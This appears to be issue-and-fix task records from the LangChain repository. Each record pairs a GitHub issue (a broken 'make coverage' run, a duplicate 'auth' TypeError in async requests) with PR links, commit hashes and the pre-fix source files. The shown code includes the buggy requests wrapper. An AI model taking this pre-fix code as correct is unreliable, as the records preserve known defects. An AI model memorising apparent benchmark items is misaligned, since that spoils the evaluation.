    max_seconds = 10
    # Wait 2^x * 1 second between each retry starting with
    # 4 seconds, then up to 10 seconds, then 10 seconds afterwards
    return retry(
        reraise=True,
        stop=stop_after_attempt(embeddings.max_retries),
        wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
        retry=(
            retry_if_exception_type(openai.error.Timeout)
            | retry_if_exception_type(openai.error.APIError)
            | retry_if_exception_type(openai.error.APIConnectionError)
            | retry_if_exception_type(openai.error.RateLimitError)
            | retry_if_exception_type(openai.error.ServiceUnavailableError)
        ),
        before_sleep=before_sleep_log(logger, logging.WARNING),
    )


def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any:
    import openai

    min_seconds = 4
    max_seconds = 10
    # Wait 2^x * 1 second between each retry starting with
    # 4 seconds, then up to 10 seconds, then 10 seconds afterwards
    async_retrying = AsyncRetrying(
        reraise=True,
        stop=stop_after_attempt(embeddings.max_retries),
        wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
        retry=(
            retry_if_exception_type(openai.error.Timeout)
            | retry_if_exception_type(openai.error.APIError)
            | retry_if_exception_type(openai.error.APIConnectionError)
            | retry_if_exception_type(openai.error.RateLimitError)
            | retry_if_exception_type(openai.error.ServiceUnavailableError)
        ),
        before_sleep=before_sleep_log(logger, logging.WARNING),
    )

    def wrap(func: Callable) -> Callable:
        async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
            async for _ in async_retrying:
                return await func(*args, **kwargs)
            raise AssertionError("this is unreachable")

        return wrapped_f

    return wrap


# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict, skip_empty: bool = False) -> dict:
    if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
        import openai

        raise openai.error.APIError("OpenAI API returned an empty embedding")
    return response


def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
    """Use tenacity to retry the embedding call."""
    retry_decorator = _create_retry_decorator(embeddings)

    @retry_decorator
    def _embed_with_retry(**kwargs: Any) -> Any:
        response = embeddings.client.create(**kwargs)
        return _check_response(response, skip_empty=embeddings.skip_empty)

    return _embed_with_retry(**kwargs)


async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
    """Use tenacity to retry the embedding call."""

    @_async_retry_decorator(embeddings)
    async def _async_embed_with_retry(**kwargs: Any) -> Any:
        response = await embeddings.client.acreate(**kwargs)
        return _check_response(response, skip_empty=embeddings.skip_empty)

    return await _async_embed_with_retry(**kwargs)


class OpenAIEmbeddings(BaseModel, Embeddings):
    """OpenAI embedding models.

    To use, you should have the ``openai`` python package installed, and the
    environment variable ``OPENAI_API_KEY`` set with your API key or pass it
    as a named parameter to the constructor.

    Example:
        .. code-block:: python

            from langchain.embeddings import OpenAIEmbeddings
            openai = OpenAIEmbeddings(openai_api_key="my-api-key")

    In order to use the library with Microsoft Azure endpoints, you need to set
    the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
    The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
    the properties of your endpoint.
    In addition, the deployment name must be passed as the model parameter.

    Example:
        .. code-block:: python

            import os

            os.environ["OPENAI_API_TYPE"] = "azure"
            os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
            os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
            os.environ["OPENAI_API_VERSION"] = "2023-05-15"
            os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"

            from langchain.embeddings.openai import OpenAIEmbeddings
            embeddings = OpenAIEmbeddings(
                deployment="your-embeddings-deployment-name",
                model="your-embeddings-model-name",
                openai_api_base="https://your-endpoint.openai.azure.com/",
                openai_api_type="azure",
            )
            text = "This is a test query."
            query_result = embeddings.embed_query(text)

    """

    client: Any = None  #: :meta private:
    model: str = "text-embedding-ada-002"
    deployment: str = model  # to support Azure OpenAI Service custom deployment names
    openai_api_version: Optional[str] = None
    # to support Azure OpenAI Service custom endpoints
    openai_api_base: Optional[str] = None
    # to support Azure OpenAI Service custom endpoints
    openai_api_type: Optional[str] = None
    # to support explicit proxy for OpenAI
    openai_proxy: Optional[str] = None
    embedding_ctx_length: int = 8191
    """The maximum number of tokens to embed at once."""
    openai_api_key: Optional[str] = None
    openai_organization: Optional[str] = None
    allowed_special: Union[Literal["all"], Set[str]] = set()
    disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
    chunk_size: int = 1000
    """Maximum number of texts to embed in each batch"""
    max_retries: int = 6
    """Maximum number of retries to make when generating."""
    request_timeout: Optional[Union[float, Tuple[float, float]]] = None
    """Timeout in seconds for the OpenAPI request."""
    headers: Any = None
    tiktoken_model_name: Optional[str] = None
    """The model name to pass to tiktoken when using this class.
    Tiktoken is used to count the number of tokens in documents to constrain
    them to be under a certain limit. By default, when set to None, this will
    be the same as the embedding model name. However, there are some cases
    where you may want to use this Embedding class with a model name not
    supported by tiktoken. This can include when using Azure embeddings or
    when using one of the many model providers that expose an OpenAI-like
    API but with different models. In those cases, in order to avoid erroring
    when tiktoken is called, you can specify a model name to use here."""
    show_progress_bar: bool = False
    """Whether to show a progress bar when embedding."""
    model_kwargs: Dict[str, Any] = Field(default_factory=dict)
    """Holds any model parameters valid for `create` call not explicitly specified."""
    skip_empty: bool = False
    """Whether to skip empty strings when embedding or raise an error.
    Defaults to not skipping."""

    class Config:
        """Configuration for this pydantic object."""

        extra = Extra.forbid

    @root_validator(pre=True)
    def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """Build extra kwargs from additional params that were passed in."""
        all_required_field_names = get_pydantic_field_names(cls)
        extra = values.get("model_kwargs", {})
        for field_name in list(values):
            if field_name in extra:
                raise ValueError(f"Found {field_name} supplied twice.")
            if field_name not in all_required_field_names:
                warnings.warn(
                    f"""WARNING! {field_name} is not default parameter.
                    {field_name} was transferred to model_kwargs.
                    Please confirm that {field_name} is what you intended."""
                )
                extra[field_name] = values.pop(field_name)

        invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
        if invalid_model_kwargs:
            raise ValueError(
                f"Parameters {invalid_model_kwargs} should be specified explicitly. "
                f"Instead they were passed in as part of `model_kwargs` parameter."
            )

        values["model_kwargs"] = extra
        return values

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that api key and python package exists in environment."""
        values["openai_api_key"] = get_from_dict_or_env(
            values, "openai_api_key", "OPENAI_API_KEY"
        )
        values["openai_api_base"] = get_from_dict_or_env(
            values,
            "openai_api_base",
            "OPENAI_API_BASE",
            default="",
        )
        values["openai_api_type"] = get_from_dict_or_env(
            values,
            "openai_api_type",
            "OPENAI_API_TYPE",
            default="",
        )
        values["openai_proxy"] = get_from_dict_or_env(
            values,
            "openai_proxy",
            "OPENAI_PROXY",
            default="",
        )
        if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
            default_api_version = "2022-12-01"
        else:
            default_api_version = ""
        values["openai_api_version"] = get_from_dict_or_env(
            values,
            "openai_api_version",
            "OPENAI_API_VERSION",
            default=default_api_version,
        )
        values["openai_organization"] = get_from_dict_or_env(
            values,
            "openai_organization",
            "OPENAI_ORGANIZATION",
            default="",
        )
        try:
            import openai

            values["client"] = openai.Embedding
        except ImportError:
            raise ImportError(
                "Could not import openai python package. "
                "Please install it with `pip install openai`."
            )
        return values

    @property
    def _invocation_params(self) -> Dict:
        openai_args = {
            "model": self.model,
            "request_timeout": self.request_timeout,
            "headers": self.headers,
            "api_key": self.openai_api_key,
            "organization": self.openai_organization,
            "api_base": self.openai_api_base,
            "api_type": self.openai_api_type,
            "api_version": self.openai_api_version,
            **self.model_kwargs,
        }
        if self.openai_api_type in ("azure", "azure_ad", "azuread"):
            openai_args["engine"] = self.deployment
        if self.openai_proxy:
            try:
                import openai
            except ImportError:
                raise ImportError(
                    "Could not import openai python package. "
                    "Please install it with `pip install openai`."
                )

            openai.proxy = {
                "http": self.openai_proxy,
                "https": self.openai_proxy,
            }  # type: ignore[assignment]  # noqa: E501
        return openai_args

    # please refer to
    # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
    def _get_len_safe_embeddings(
        self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
    ) -> List[List[float]]:
        embeddings: List[List[float]] = [[] for _ in range(len(texts))]
        try:
            import tiktoken
        except ImportError:
            raise ImportError(
                "Could not import tiktoken python package. "
                "This is needed in order to for OpenAIEmbeddings. "
                "Please install it with `pip install tiktoken`."
            )

        tokens = []
        indices = []
        model_name = self.tiktoken_model_name or self.model
        try:
            encoding = tiktoken.encoding_for_model(model_name)
        except KeyError:
            logger.warning("Warning: model not found. Using cl100k_base encoding.")
            model = "cl100k_base"
            encoding = tiktoken.get_encoding(model)
        for i, text in enumerate(texts):
            if self.model.endswith("001"):
                # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
                # replace newlines, which can negatively affect performance.
                text = text.replace("\n", " ")
            token = encoding.encode(
                text,
                allowed_special=self.allowed_special,
                disallowed_special=self.disallowed_special,
            )
            for j in range(0, len(token), self.embedding_ctx_length):
                tokens.append(token[j : j + self.embedding_ctx_length])
                indices.append(i)

        batched_embeddings: List[List[float]] = []
        _chunk_size = chunk_size or self.chunk_size

        if self.show_progress_bar:
            try:
                from tqdm.auto import tqdm

                _iter = tqdm(range(0, len(tokens), _chunk_size))
            except ImportError:
                _iter = range(0, len(tokens), _chunk_size)
        else:
            _iter = range(0, len(tokens), _chunk_size)

        for i in _iter:
            response = embed_with_retry(
                self,
                input=tokens[i : i + _chunk_size],
                **self._invocation_params,
            )
            batched_embeddings.extend(r["embedding"] for r in response["data"])

        results: List[List[List[float]]] = [[] for _ in range(len(texts))]
        num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
        for i in range(len(indices)):
            if self.skip_empty and len(batched_embeddings[i]) == 1:
                continue
            results[indices[i]].append(batched_embeddings[i])
            num_tokens_in_batch[indices[i]].append(len(tokens[i]))

        for i in range(len(texts)):
            _result = results[i]
            if len(_result) == 0:
                average = embed_with_retry(
                    self,
                    input="",
                    **self._invocation_params,
                )["data"][0]["embedding"]
            else:
                average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
            embeddings[i] = (average / np.linalg.norm(average)).tolist()

        return embeddings

    # please refer to
    # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
    async def _aget_len_safe_embeddings(
        self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
    ) -> List[List[float]]:
        embeddings: List[List[float]] = [[] for _ in range(len(texts))]
        try:
            import tiktoken
        except ImportError:
            raise ImportError(
                "Could not import tiktoken python package. "
                "This is needed in order to for OpenAIEmbeddings. "
                "Please install it with `pip install tiktoken`."
            )

        tokens = []
        indices = []
        model_name = self.tiktoken_model_name or self.model
        try:
            encoding = tiktoken.encoding_for_model(model_name)
        except KeyError:
            logger.warning("Warning: model not found. Using cl100k_base encoding.")
            model = "cl100k_base"
            encoding = tiktoken.get_encoding(model)
        for i, text in enumerate(texts):
            if self.model.endswith("001"):
                # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
                # replace newlines, which can negatively affect performance.
                text = text.replace("\n", " ")
            token = encoding.encode(
                text,
                allowed_special=self.allowed_special,
                disallowed_special=self.disallowed_special,
            )
            for j in range(0, len(token), self.embedding_ctx_length):
                tokens.append(token[j : j + self.embedding_ctx_length])
                indices.append(i)

        batched_embeddings: List[List[float]] = []
        _chunk_size = chunk_size or self.chunk_size
        for i in range(0, len(tokens), _chunk_size):
            response = await async_embed_with_retry(
                self,
                input=tokens[i : i + _chunk_size],
                **self._invocation_params,
            )
            batched_embeddings.extend(r["embedding"] for r in response["data"])

        results: List[List[List[float]]] = [[] for _ in range(len(texts))]
        num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
        for i in range(len(indices)):
            results[indices[i]].append(batched_embeddings[i])
            num_tokens_in_batch[indices[i]].append(len(tokens[i]))

        for i in range(len(texts)):
            _result = results[i]
            if len(_result) == 0:
                average = (
                    await async_embed_with_retry(
                        self,
                        input="",
                        **self._invocation_params,
                    )
                )["data"][0]["embedding"]
            else:
                average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
            embeddings[i] = (average / np.linalg.norm(average)).tolist()

        return embeddings

    def embed_documents(
        self, texts: List[str], chunk_size: Optional[int] = 0
    ) -> List[List[float]]:
        """Call out to OpenAI's embedding endpoint for embedding search docs.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size of embeddings. If None, will use the chunk
                size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        # NOTE: to keep things simple, we assume the list may contain texts longer
        #       than the maximum context and use length-safe embedding function.
        return self._get_len_safe_embeddings(texts, engine=self.deployment)

    async def aembed_documents(
        self, texts: List[str], chunk_size: Optional[int] = 0
    ) -> List[List[float]]:
        """Call out to OpenAI's embedding endpoint async for embedding search docs.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size of embeddings. If None, will use the chunk
                size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        # NOTE: to keep things simple, we assume the list may contain texts longer
        #       than the maximum context and use length-safe embedding function.
        return await self._aget_len_safe_embeddings(texts, engine=self.deployment)

    def embed_query(self, text: str) -> List[float]:
        """Call out to OpenAI's embedding endpoint for embedding query text.

        Args:
            text: The text to embed.

        Returns:
            Embedding for the text.
        """
        return self.embed_documents([text])[0]

    async def aembed_query(self, text: str) -> List[float]:
        """Call out to OpenAI's embedding endpoint async for embedding query text.

        Args:
            text: The text to embed.

        Returns:
            Embedding for the text.
        """
        embeddings = await self.aembed_documents([text])
        return embeddings[0]
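To make the batching in `_get_len_safe_embeddings` concrete, a small standalone sketch of the same arithmetic (the numbers are illustrative):

```python
embedding_ctx_length = 8191  # max tokens per embedded window
chunk_size = 1000            # max inputs per API request

token_ids = list(range(20_000))  # stand-in for one long document's tokens
windows = [
    token_ids[j : j + embedding_ctx_length]
    for j in range(0, len(token_ids), embedding_ctx_length)
]
# 3 windows here; since 3 < chunk_size they would go out in one API call,
# and the per-window vectors are then length-weighted, averaged, and
# re-normalized into a single embedding for the original text.
print(len(windows))
```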
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,941
Issue: `make coverage` doesn't work locally
### Issue you'd like to raise. When I set up the local environment and try to run `make coverage`, I get this error: ```bash ; make coverage poetry run pytest --cov \ --cov-config=.coveragerc \ --cov-report xml \ --cov-report term-missing:skip-covered ================================================================================================================ test session starts ================================================================================================================ platform darwin -- Python 3.9.17, pytest-7.4.0, pluggy-1.2.0 rootdir: /Users/cjameson/workspace/cjcjameson/langchain/libs/langchain configfile: pyproject.toml plugins: asyncio-0.20.3, cov-4.1.0, vcr-1.0.2, syrupy-4.2.1, mock-3.11.1, anyio-3.7.1, dotenv-0.5.2, socket-0.6.0 asyncio: mode=strict collected 2832 items / 1 error / 4 skipped INTERNALERROR> Traceback (most recent call last): INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/config/__init__.py", line 1611, in getoption INTERNALERROR> val = getattr(self.option, name) INTERNALERROR> AttributeError: 'Namespace' object has no attribute 'only_extended' INTERNALERROR> INTERNALERROR> The above exception was the direct cause of the following exception: INTERNALERROR> INTERNALERROR> Traceback (most recent call last): INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 270, in wrap_session INTERNALERROR> session.exitstatus = doit(config, session) or 0 INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 323, in _main INTERNALERROR> config.hook.pytest_collection(session=session) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_hooks.py", line 433, in __call__ INTERNALERROR> return self._hookexec(self.name, self._hookimpls, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_manager.py", line 112, in _hookexec INTERNALERROR> return self._inner_hookexec(hook_name, methods, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 155, in _multicall INTERNALERROR> return outcome.get_result() INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_result.py", line 108, in get_result INTERNALERROR> raise exc.with_traceback(exc.__traceback__) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 80, in _multicall INTERNALERROR> res = hook_impl.function(*args) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 334, in pytest_collection INTERNALERROR> session.perform_collect() INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 672, in perform_collect INTERNALERROR> hook.pytest_collection_modifyitems( INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_hooks.py", line 433, in __call__ INTERNALERROR> return self._hookexec(self.name, self._hookimpls, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_manager.py", line 112, in _hookexec 
INTERNALERROR> return self._inner_hookexec(hook_name, methods, kwargs, firstresult) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 155, in _multicall INTERNALERROR> return outcome.get_result() INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_result.py", line 108, in get_result INTERNALERROR> raise exc.with_traceback(exc.__traceback__) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 80, in _multicall INTERNALERROR> res = hook_impl.function(*args) INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/libs/langchain/tests/unit_tests/conftest.py", line 43, in pytest_collection_modifyitems INTERNALERROR> only_extended = config.getoption("--only-extended") or False INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/config/__init__.py", line 1622, in getoption INTERNALERROR> raise ValueError(f"no option named {name!r}") from e INTERNALERROR> ValueError: no option named 'only_extended' ====================================================================================================== 4 skipped, 1 warning, 1 error in 3.80s ======================================================================================================= make: *** [coverage] Error 3 ``` ### Suggestion: It looks like the `pytest_addoption` in `tests/unit_tests/conftest.py` is not being found. This stack-overflow attributes it to pytest not being able to find `conftest.py` files in nested directories. https://stackoverflow.com/a/31526934 The recommendations to create a plugin or move the conftest.py files don't seem palatable, but let me know if maybe that's the thing to do Given the re-organization into `libs/langchain`, that could have messed up pytest local development. I'm curious if/how it works in CI ...
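For reference, the missing option comes from a `pytest_addoption` hook; a simplified sketch of what `tests/unit_tests/conftest.py` registers (the real file may define more options). pytest only honors this hook in a rootdir-level `conftest.py` or a plugin, which is why invoking pytest from the wrong working directory loses the option:

```python
# Simplified sketch of the hook that defines --only-extended.
def pytest_addoption(parser):
    parser.addoption(
        "--only-extended",
        action="store_true",
        help="Only run extended tests.",
    )
```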
https://github.com/langchain-ai/langchain/issues/10941
https://github.com/langchain-ai/langchain/pull/10974
040d436b3f0ba21028850de34dc7780cf4700e46
05d5fcfdf89abea0993998689fb8e9a8133b7276
"2023-09-22T15:58:24Z"
python
"2023-09-23T23:03:53Z"
libs/langchain/Makefile
.PHONY: all clean docs_build docs_clean docs_linkcheck api_docs_build api_docs_clean api_docs_linkcheck format lint test tests test_watch integration_tests docker_tests help extended_tests

# Default target executed when no arguments are given to make.
all: help

######################
# TESTING AND COVERAGE
######################

# Run unit tests and generate a coverage report.
coverage:
	poetry run pytest --cov \
		--cov-config=.coveragerc \
		--cov-report xml \
		--cov-report term-missing:skip-covered

# Define a variable for the test file path.
TEST_FILE ?= tests/unit_tests/

test:
	poetry run pytest --disable-socket --allow-unix-socket $(TEST_FILE)

tests:
	poetry run pytest --disable-socket --allow-unix-socket $(TEST_FILE)

extended_tests:
	poetry run pytest --disable-socket --allow-unix-socket --only-extended tests/unit_tests

test_watch:
	poetry run ptw --now . -- tests/unit_tests

integration_tests:
	poetry run pytest tests/integration_tests

scheduled_tests:
	poetry run pytest -m scheduled tests/integration_tests

docker_tests:
	docker build -t my-langchain-image:test .
	docker run --rm my-langchain-image:test

######################
# LINTING AND FORMATTING
######################

# Define a variable for Python and notebook files.
PYTHON_FILES=.
lint format: PYTHON_FILES=.
lint_diff format_diff: PYTHON_FILES=$(shell git diff --relative=libs/langchain --name-only --diff-filter=d master | grep -E '\.py$$|\.ipynb$$')

lint lint_diff:
	./scripts/check_pydantic.sh .
	./scripts/check_imports.sh
	poetry run ruff .
	poetry run black $(PYTHON_FILES) --check
	poetry run mypy $(PYTHON_FILES)

format format_diff:
	poetry run black $(PYTHON_FILES)
	poetry run ruff --select I --fix $(PYTHON_FILES)

spell_check:
	poetry run codespell --toml pyproject.toml

spell_fix:
	poetry run codespell --toml pyproject.toml -w

######################
# HELP
######################

help:
	@echo '===================='
	@echo 'clean - run docs_clean and api_docs_clean'
	@echo 'docs_build - build the documentation'
	@echo 'docs_clean - clean the documentation build artifacts'
	@echo 'docs_linkcheck - run linkchecker on the documentation'
	@echo 'api_docs_build - build the API Reference documentation'
	@echo 'api_docs_clean - clean the API Reference documentation build artifacts'
	@echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation'
	@echo '-- LINTING --'
	@echo 'format - run code formatters'
	@echo 'lint - run linters'
	@echo 'spell_check - run codespell on the project'
	@echo 'spell_fix - run codespell on the project and fix the errors'
	@echo '-- TESTS --'
	@echo 'coverage - run unit tests and generate coverage report'
	@echo 'test - run unit tests'
	@echo 'tests - run unit tests (alias for "make test")'
	@echo 'test TEST_FILE=<test_file> - run all tests in file'
	@echo 'extended_tests - run only extended unit tests'
	@echo 'test_watch - run unit tests in watch mode'
	@echo 'integration_tests - run integration tests'
	@echo 'docker_tests - run unit tests in docker'
	@echo '-- DOCUMENTATION tasks are from the top-level Makefile --'
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,842
TypeError Due to Duplicate 'auth' Argument in aiohttp Request When a Header Is Provided to APIChain
### System Info Langchain version: 0.0.253 Python: 3.11 ### Who can help? @agola11 @hwchase17 @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [X] Async ### Reproduction 1. Environment Setup: Ensure you're using Python 3.11. Install the necessary libraries and dependencies: ```bash pip install fastapi uvicorn aiohttp langchain ``` 2. APIChain Initialization: Set up the APIChain utility using the provided API documentation and the chosen language model: ```python from langchain import APIChain chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=chosen_llm, verbose=True, headers=headers) ``` 3. Run the FastAPI application: Use a tool like Uvicorn to start your FastAPI app: ```bash uvicorn your_app_name:app --reload ``` 4. Trigger the API Endpoint: Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up. 5. Execute the Callback: Inside the relevant endpoint, ensure you have the following snippet: ```python with get_openai_callback() as cb: response = await chain.arun(user_query) ``` 6. Observe the Error: You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. This happens because a header was provided to APIChain and it was run with the `arun` method. ### Expected behavior Request Execution: The chain.arun(user_query) method should interact with the intended external service or API without any issues. The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions.
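A minimal, self-contained reproduction of the underlying mechanism (the URL and credentials are placeholders): when `auth` is passed explicitly while also present in `**kwargs`, the call receives it twice and Python raises the TypeError before any request is made.

```python
import asyncio

import aiohttp

async def main() -> None:
    kwargs = {"auth": aiohttp.BasicAuth("user", "pass")}
    async with aiohttp.ClientSession() as session:
        # TypeError: request() got multiple values for keyword argument 'auth'
        async with session.request(
            "GET", "https://example.com", auth=kwargs["auth"], **kwargs
        ) as resp:
            print(resp.status)

asyncio.run(main())
```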
https://github.com/langchain-ai/langchain/issues/8842
https://github.com/langchain-ai/langchain/pull/11010
88a02076affa2accd0465ee5ea9848b68d0e812b
956ee981c03874d6e413a51eed9f7b437e52f07c
"2023-08-06T23:55:31Z"
python
"2023-09-25T14:45:04Z"
libs/langchain/langchain/utilities/requests.py
"""Lightweight wrapper around requests library, with async support.""" from contextlib import asynccontextmanager from typing import Any, AsyncGenerator, Dict, Optional import aiohttp import requests from langchain.pydantic_v1 import BaseModel, Extra class Requests(BaseModel): """Wrapper around requests to handle auth and async. The main purpose of this wrapper is to handle authentication (by saving headers) and enable easy async methods on the same base object. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None auth: Optional[Any] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True def get(self, url: str, **kwargs: Any) -> requests.Response: """GET the URL and return the text.""" return requests.get(url, headers=self.headers, auth=self.auth, **kwargs) def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """POST to the URL and return the text.""" return requests.post( url, json=data, headers=self.headers, auth=self.auth, **kwargs ) def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PATCH the URL and return the text.""" return requests.patch( url, json=data, headers=self.headers, auth=self.auth, **kwargs ) def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response: """PUT the URL and return the text.""" return requests.put( url, json=data, headers=self.headers, auth=self.auth, **kwargs ) def delete(self, url: str, **kwargs: Any) -> requests.Response: """DELETE the URL and return the text.""" return requests.delete(url, headers=self.headers, auth=self.auth, **kwargs) @asynccontextmanager async def _arequest( self, method: str, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """Make an async request.""" if not self.aiosession: async with aiohttp.ClientSession() as session: async with session.request( method, url, headers=self.headers, auth=self.auth, **kwargs ) as response: yield response else: async with self.aiosession.request( method, url, headers=self.headers, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def aget( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """GET the URL and return the text asynchronously.""" async with self._arequest("GET", url, auth=self.auth, **kwargs) as response: yield response @asynccontextmanager async def apost( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """POST to the URL and return the text asynchronously.""" async with self._arequest( "POST", url, json=data, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def apatch( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PATCH the URL and return the text asynchronously.""" async with self._arequest( "PATCH", url, json=data, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def aput( self, url: str, data: Dict[str, Any], **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """PUT the URL and return the text asynchronously.""" async with self._arequest( "PUT", url, json=data, auth=self.auth, **kwargs ) as response: yield response @asynccontextmanager async def adelete( self, url: str, **kwargs: Any ) -> AsyncGenerator[aiohttp.ClientResponse, None]: """DELETE the URL and return the text asynchronously.""" async with 
self._arequest("DELETE", url, auth=self.auth, **kwargs) as response: yield response class TextRequestsWrapper(BaseModel): """Lightweight wrapper around requests library. The main purpose of this wrapper is to always return a text output. """ headers: Optional[Dict[str, str]] = None aiosession: Optional[aiohttp.ClientSession] = None auth: Optional[Any] = None class Config: """Configuration for this pydantic object.""" extra = Extra.forbid arbitrary_types_allowed = True @property def requests(self) -> Requests: return Requests( headers=self.headers, aiosession=self.aiosession, auth=self.auth ) def get(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text.""" return self.requests.get(url, **kwargs).text def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text.""" return self.requests.post(url, data, **kwargs).text def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text.""" return self.requests.patch(url, data, **kwargs).text def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text.""" return self.requests.put(url, data, **kwargs).text def delete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text.""" return self.requests.delete(url, **kwargs).text async def aget(self, url: str, **kwargs: Any) -> str: """GET the URL and return the text asynchronously.""" async with self.requests.aget(url, **kwargs) as response: return await response.text() async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """POST to the URL and return the text asynchronously.""" async with self.requests.apost(url, data, **kwargs) as response: return await response.text() async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PATCH the URL and return the text asynchronously.""" async with self.requests.apatch(url, data, **kwargs) as response: return await response.text() async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str: """PUT the URL and return the text asynchronously.""" async with self.requests.aput(url, data, **kwargs) as response: return await response.text() async def adelete(self, url: str, **kwargs: Any) -> str: """DELETE the URL and return the text asynchronously.""" async with self.requests.adelete(url, **kwargs) as response: return await response.text() # For backwards compatibility RequestsWrapper = TextRequestsWrapper
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,912
LocalAI embeddings shouldn't require OpenAI
